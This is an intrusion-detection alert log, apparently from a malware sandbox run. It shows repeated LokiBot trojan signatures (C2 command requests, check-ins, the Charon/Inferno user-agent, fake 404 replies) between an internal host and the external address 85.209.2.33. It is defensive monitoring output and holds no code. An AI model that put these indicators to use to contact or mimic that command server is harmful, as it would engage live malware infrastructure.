                                                            12/01/21-20:23:53.280275TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:53.280275TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:53.280275TCP2025381ET TROJAN LokiBot Checkin4999880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:53.280275TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:54.205922TCP2025483ET TROJAN LokiBot Fake 404 Response804999885.209.2.33192.168.11.20
                                                            12/01/21-20:23:54.655723TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999980192.168.11.2085.209.2.33
                                                            12/01/21-20:23:54.655723TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999980192.168.11.2085.209.2.33
                                                            12/01/21-20:23:54.655723TCP2025381ET TROJAN LokiBot Checkin4999980192.168.11.2085.209.2.33
                                                            12/01/21-20:23:54.655723TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999980192.168.11.2085.209.2.33
                                                            12/01/21-20:23:55.327884TCP2025483ET TROJAN LokiBot Fake 404 Response804999985.209.2.33192.168.11.20
                                                            12/01/21-20:23:55.750963TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:55.750963TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:55.750963TCP2025381ET TROJAN LokiBot Checkin5000080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:55.750963TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:56.585726TCP2025483ET TROJAN LokiBot Fake 404 Response805000085.209.2.33192.168.11.20
                                                            12/01/21-20:23:57.025172TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:57.025172TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:57.025172TCP2025381ET TROJAN LokiBot Checkin5000180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:57.025172TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:57.949769TCP2025483ET TROJAN LokiBot Fake 404 Response805000185.209.2.33192.168.11.20
                                                            12/01/21-20:23:58.381739TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:58.381739TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:58.381739TCP2025381ET TROJAN LokiBot Checkin5000280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:58.381739TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:59.178497TCP2025483ET TROJAN LokiBot Fake 404 Response805000285.209.2.33192.168.11.20
                                                            12/01/21-20:23:59.617903TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:59.617903TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:59.617903TCP2025381ET TROJAN LokiBot Checkin5000380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:59.617903TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:00.520783TCP2025483ET TROJAN LokiBot Fake 404 Response805000385.209.2.33192.168.11.20
                                                            12/01/21-20:24:00.969122TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:00.969122TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:00.969122TCP2025381ET TROJAN LokiBot Checkin5000480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:00.969122TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:01.888490TCP2025483ET TROJAN LokiBot Fake 404 Response805000485.209.2.33192.168.11.20
                                                            12/01/21-20:24:02.305526TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:02.305526TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:02.305526TCP2025381ET TROJAN LokiBot Checkin5000580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:02.305526TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:03.181721TCP2025483ET TROJAN LokiBot Fake 404 Response805000585.209.2.33192.168.11.20
                                                            12/01/21-20:24:03.607935TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:03.607935TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:03.607935TCP2025381ET TROJAN LokiBot Checkin5000680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:03.607935TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:04.399034TCP2025483ET TROJAN LokiBot Fake 404 Response805000685.209.2.33192.168.11.20
                                                            12/01/21-20:24:04.812663TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:04.812663TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:04.812663TCP2025381ET TROJAN LokiBot Checkin5000780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:04.812663TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:05.517530TCP2025483ET TROJAN LokiBot Fake 404 Response805000785.209.2.33192.168.11.20
                                                            12/01/21-20:24:05.933996TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:05.933996TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:05.933996TCP2025381ET TROJAN LokiBot Checkin5000880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:05.933996TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:06.796359TCP2025483ET TROJAN LokiBot Fake 404 Response805000885.209.2.33192.168.11.20
                                                            12/01/21-20:24:07.235797TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:07.235797TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:07.235797TCP2025381ET TROJAN LokiBot Checkin5000980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:07.235797TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:08.087472TCP2025483ET TROJAN LokiBot Fake 404 Response805000985.209.2.33192.168.11.20
                                                            12/01/21-20:24:08.520934TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001080192.168.11.2085.209.2.33
                                                            12/01/21-20:24:08.520934TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001080192.168.11.2085.209.2.33
                                                            12/01/21-20:24:08.520934TCP2025381ET TROJAN LokiBot Checkin5001080192.168.11.2085.209.2.33
                                                            12/01/21-20:24:08.520934TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001080192.168.11.2085.209.2.33
                                                            12/01/21-20:24:09.406064TCP2025483ET TROJAN LokiBot Fake 404 Response805001085.209.2.33192.168.11.20
                                                            12/01/21-20:24:09.850752TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001180192.168.11.2085.209.2.33
                                                            12/01/21-20:24:09.850752TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001180192.168.11.2085.209.2.33
                                                            12/01/21-20:24:09.850752TCP2025381ET TROJAN LokiBot Checkin5001180192.168.11.2085.209.2.33
                                                            12/01/21-20:24:09.850752TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001180192.168.11.2085.209.2.33
                                                            12/01/21-20:24:10.693589TCP2025483ET TROJAN LokiBot Fake 404 Response805001185.209.2.33192.168.11.20
                                                            12/01/21-20:24:11.111247TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001280192.168.11.2085.209.2.33
                                                            12/01/21-20:24:11.111247TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001280192.168.11.2085.209.2.33
                                                            12/01/21-20:24:11.111247TCP2025381ET TROJAN LokiBot Checkin5001280192.168.11.2085.209.2.33
                                                            12/01/21-20:24:11.111247TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001280192.168.11.2085.209.2.33
                                                            12/01/21-20:24:12.373274TCP2025483ET TROJAN LokiBot Fake 404 Response805001285.209.2.33192.168.11.20
                                                            12/01/21-20:24:12.792947TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:12.792947TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:12.792947TCP2025381ET TROJAN LokiBot Checkin5001380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:12.792947TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:14.532365TCP2025483ET TROJAN LokiBot Fake 404 Response805001385.209.2.33192.168.11.20
                                                            12/01/21-20:24:14.962945TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:14.962945TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:14.962945TCP2025381ET TROJAN LokiBot Checkin5001480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:14.962945TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:16.706684TCP2025483ET TROJAN LokiBot Fake 404 Response805001485.209.2.33192.168.11.20
                                                            12/01/21-20:24:17.147287TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:17.147287TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:17.147287TCP2025381ET TROJAN LokiBot Checkin5001580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:17.147287TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:18.004845TCP2025483ET TROJAN LokiBot Fake 404 Response805001585.209.2.33192.168.11.20
                                                            12/01/21-20:24:18.438511TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:18.438511TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:18.438511TCP2025381ET TROJAN LokiBot Checkin5001680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:18.438511TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:19.108204TCP2025483ET TROJAN LokiBot Fake 404 Response805001685.209.2.33192.168.11.20
                                                            12/01/21-20:24:19.535131TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:19.535131TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:19.535131TCP2025381ET TROJAN LokiBot Checkin5001780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:19.535131TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:20.368815TCP2025483ET TROJAN LokiBot Fake 404 Response805001785.209.2.33192.168.11.20
                                                            12/01/21-20:24:20.771833TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:20.771833TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:20.771833TCP2025381ET TROJAN LokiBot Checkin5001880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:20.771833TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:21.558907TCP2025483ET TROJAN LokiBot Fake 404 Response805001885.209.2.33192.168.11.20
                                                            12/01/21-20:24:21.899736TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:21.899736TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:21.899736TCP2025381ET TROJAN LokiBot Checkin5001980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:21.899736TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:22.800498TCP2025483ET TROJAN LokiBot Fake 404 Response805001985.209.2.33192.168.11.20
                                                            12/01/21-20:24:23.240222TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002080192.168.11.2085.209.2.33
                                                            12/01/21-20:24:23.240222TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002080192.168.11.2085.209.2.33
                                                            12/01/21-20:24:23.240222TCP2025381ET TROJAN LokiBot Checkin5002080192.168.11.2085.209.2.33
                                                            12/01/21-20:24:23.240222TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002080192.168.11.2085.209.2.33
                                                            12/01/21-20:24:24.109558TCP2025483ET TROJAN LokiBot Fake 404 Response805002085.209.2.33192.168.11.20
                                                            12/01/21-20:24:24.554463TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002180192.168.11.2085.209.2.33
                                                            12/01/21-20:24:24.554463TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002180192.168.11.2085.209.2.33
                                                            12/01/21-20:24:24.554463TCP2025381ET TROJAN LokiBot Checkin5002180192.168.11.2085.209.2.33
                                                            12/01/21-20:24:24.554463TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002180192.168.11.2085.209.2.33
                                                            12/01/21-20:24:25.440709TCP2025483ET TROJAN LokiBot Fake 404 Response805002185.209.2.33192.168.11.20
                                                            12/01/21-20:24:25.875482TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002280192.168.11.2085.209.2.33
                                                            12/01/21-20:24:25.875482TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002280192.168.11.2085.209.2.33
                                                            12/01/21-20:24:25.875482TCP2025381ET TROJAN LokiBot Checkin5002280192.168.11.2085.209.2.33
                                                            12/01/21-20:24:25.875482TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002280192.168.11.2085.209.2.33
                                                            12/01/21-20:24:26.533613TCP2025483ET TROJAN LokiBot Fake 404 Response805002285.209.2.33192.168.11.20
                                                            12/01/21-20:24:26.967687TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:26.967687TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:26.967687TCP2025381ET TROJAN LokiBot Checkin5002380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:26.967687TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:27.814627TCP2025483ET TROJAN LokiBot Fake 404 Response805002385.209.2.33192.168.11.20
                                                            12/01/21-20:24:28.191100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:28.191100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:28.191100TCP2025381ET TROJAN LokiBot Checkin5002480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:28.191100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:29.070157TCP2025483ET TROJAN LokiBot Fake 404 Response805002485.209.2.33192.168.11.20
                                                            12/01/21-20:24:29.501221TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:29.501221TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:29.501221TCP2025381ET TROJAN LokiBot Checkin5002580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:29.501221TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:30.360668TCP2025483ET TROJAN LokiBot Fake 404 Response805002585.209.2.33192.168.11.20
                                                            12/01/21-20:24:30.797225TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:30.797225TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:30.797225TCP2025381ET TROJAN LokiBot Checkin5002680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:30.797225TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:31.611690TCP2025483ET TROJAN LokiBot Fake 404 Response805002685.209.2.33192.168.11.20
                                                            12/01/21-20:24:32.032357TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:32.032357TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:32.032357TCP2025381ET TROJAN LokiBot Checkin5002780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:32.032357TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:32.726457TCP2025483ET TROJAN LokiBot Fake 404 Response805002785.209.2.33192.168.11.20
                                                            12/01/21-20:24:33.162165TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:33.162165TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:33.162165TCP2025381ET TROJAN LokiBot Checkin5002880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:33.162165TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:34.078717TCP2025483ET TROJAN LokiBot Fake 404 Response805002885.209.2.33192.168.11.20
                                                            12/01/21-20:24:34.515333TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:34.515333TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:34.515333TCP2025381ET TROJAN LokiBot Checkin5002980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:34.515333TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:36.162240TCP2025483ET TROJAN LokiBot Fake 404 Response805002985.209.2.33192.168.11.20
                                                            12/01/21-20:24:36.588215TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003080192.168.11.2085.209.2.33
                                                            12/01/21-20:24:36.588215TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003080192.168.11.2085.209.2.33
                                                            12/01/21-20:24:36.588215TCP2025381ET TROJAN LokiBot Checkin5003080192.168.11.2085.209.2.33
                                                            12/01/21-20:24:36.588215TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003080192.168.11.2085.209.2.33
                                                            12/01/21-20:24:37.537499TCP2025483ET TROJAN LokiBot Fake 404 Response805003085.209.2.33192.168.11.20
                                                            12/01/21-20:24:37.967372TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003180192.168.11.2085.209.2.33
                                                            12/01/21-20:24:37.967372TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003180192.168.11.2085.209.2.33
                                                            12/01/21-20:24:37.967372TCP2025381ET TROJAN LokiBot Checkin5003180192.168.11.2085.209.2.33
                                                            12/01/21-20:24:37.967372TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003180192.168.11.2085.209.2.33
                                                            12/01/21-20:24:38.703060TCP2025483ET TROJAN LokiBot Fake 404 Response805003185.209.2.33192.168.11.20
                                                            12/01/21-20:24:39.098254TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003280192.168.11.2085.209.2.33
                                                            12/01/21-20:24:39.098254TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003280192.168.11.2085.209.2.33
                                                            12/01/21-20:24:39.098254TCP2025381ET TROJAN LokiBot Checkin5003280192.168.11.2085.209.2.33
                                                            12/01/21-20:24:39.098254TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003280192.168.11.2085.209.2.33
                                                            12/01/21-20:24:39.973124TCP2025483ET TROJAN LokiBot Fake 404 Response805003285.209.2.33192.168.11.20
                                                            12/01/21-20:24:40.409672TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:40.409672TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:40.409672TCP2025381ET TROJAN LokiBot Checkin5003380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:40.409672TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:41.253341TCP2025483ET TROJAN LokiBot Fake 404 Response805003385.209.2.33192.168.11.20
                                                            12/01/21-20:24:41.679161TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:41.679161TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:41.679161TCP2025381ET TROJAN LokiBot Checkin5003480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:41.679161TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:42.532117TCP2025483ET TROJAN LokiBot Fake 404 Response805003485.209.2.33192.168.11.20
                                                            12/01/21-20:24:42.971309TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:42.971309TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:42.971309TCP2025381ET TROJAN LokiBot Checkin5003580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:42.971309TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:43.850900TCP2025483ET TROJAN LokiBot Fake 404 Response805003585.209.2.33192.168.11.20
                                                            12/01/21-20:24:44.254388TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:44.254388TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:44.254388TCP2025381ET TROJAN LokiBot Checkin5003680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:44.254388TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:45.075736TCP2025483ET TROJAN LokiBot Fake 404 Response805003685.209.2.33192.168.11.20
                                                            12/01/21-20:24:45.516553TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:45.516553TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:45.516553TCP2025381ET TROJAN LokiBot Checkin5003780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:45.516553TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:46.167854TCP2025483ET TROJAN LokiBot Fake 404 Response805003785.209.2.33192.168.11.20
                                                            12/01/21-20:24:46.599069TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:46.599069TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:46.599069TCP2025381ET TROJAN LokiBot Checkin5003880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:46.599069TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:47.495508TCP2025483ET TROJAN LokiBot Fake 404 Response805003885.209.2.33192.168.11.20
                                                            12/01/21-20:24:47.906245TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:47.906245TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:47.906245TCP2025381ET TROJAN LokiBot Checkin5003980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:47.906245TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:48.730715TCP2025483ET TROJAN LokiBot Fake 404 Response805003985.209.2.33192.168.11.20
                                                            12/01/21-20:24:49.175154TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004080192.168.11.2085.209.2.33
                                                            12/01/21-20:24:49.175154TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004080192.168.11.2085.209.2.33
                                                            12/01/21-20:24:49.175154TCP2025381ET TROJAN LokiBot Checkin5004080192.168.11.2085.209.2.33
                                                            12/01/21-20:24:49.175154TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004080192.168.11.2085.209.2.33
                                                            12/01/21-20:24:50.015373TCP2025483ET TROJAN LokiBot Fake 404 Response805004085.209.2.33192.168.11.20
                                                            12/01/21-20:24:50.450646TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004280192.168.11.2085.209.2.33
                                                            12/01/21-20:24:50.450646TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004280192.168.11.2085.209.2.33
                                                            12/01/21-20:24:50.450646TCP2025381ET TROJAN LokiBot Checkin5004280192.168.11.2085.209.2.33
                                                            12/01/21-20:24:50.450646TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004280192.168.11.2085.209.2.33
                                                            12/01/21-20:24:51.309434TCP2025483ET TROJAN LokiBot Fake 404 Response805004285.209.2.33192.168.11.20
                                                            12/01/21-20:24:51.744128TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:51.744128TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:51.744128TCP2025381ET TROJAN LokiBot Checkin5004380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:51.744128TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004380192.168.11.2085.209.2.33
                                                            12/01/21-20:24:52.437967TCP2025483ET TROJAN LokiBot Fake 404 Response805004385.209.2.33192.168.11.20
                                                            12/01/21-20:24:52.834561TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:52.834561TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:52.834561TCP2025381ET TROJAN LokiBot Checkin5004480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:52.834561TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004480192.168.11.2085.209.2.33
                                                            12/01/21-20:24:53.658602TCP2025483ET TROJAN LokiBot Fake 404 Response805004485.209.2.33192.168.11.20
                                                            12/01/21-20:24:54.091499TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:54.091499TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004580192.168.11.2085.209.2.33
